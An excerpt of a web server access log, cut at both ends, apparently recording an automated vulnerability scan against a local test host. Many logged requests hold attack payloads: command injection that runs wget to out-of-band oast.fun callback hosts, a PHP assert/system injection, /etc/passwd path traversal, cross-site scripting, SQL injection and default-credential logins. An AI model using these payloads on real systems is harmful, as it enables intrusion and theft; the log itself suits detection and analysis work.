/29N5mBSEDsOlFyGefTXBoX5irVm.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://ca2u0eosmpv1jhs80ca0a89gympaxi774.oast.fun%22)%7D' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.initial.sql HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/logoff.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_shell_cmd.gch HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /get_dkey.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /installer-log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opcache-status/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loadtextfile.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cpqlogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_next/static/../server/pages-manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elmah.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"\x0D\x0A\x0D\x0A&e1;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deltaweb/hmi_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../..//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-opcache-status/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /synnefoclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://ca2u0eosmpv1jhs80ca0rhas8jgkx7ctn.oast.fun%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/install.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opcache-status/opcache.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix= 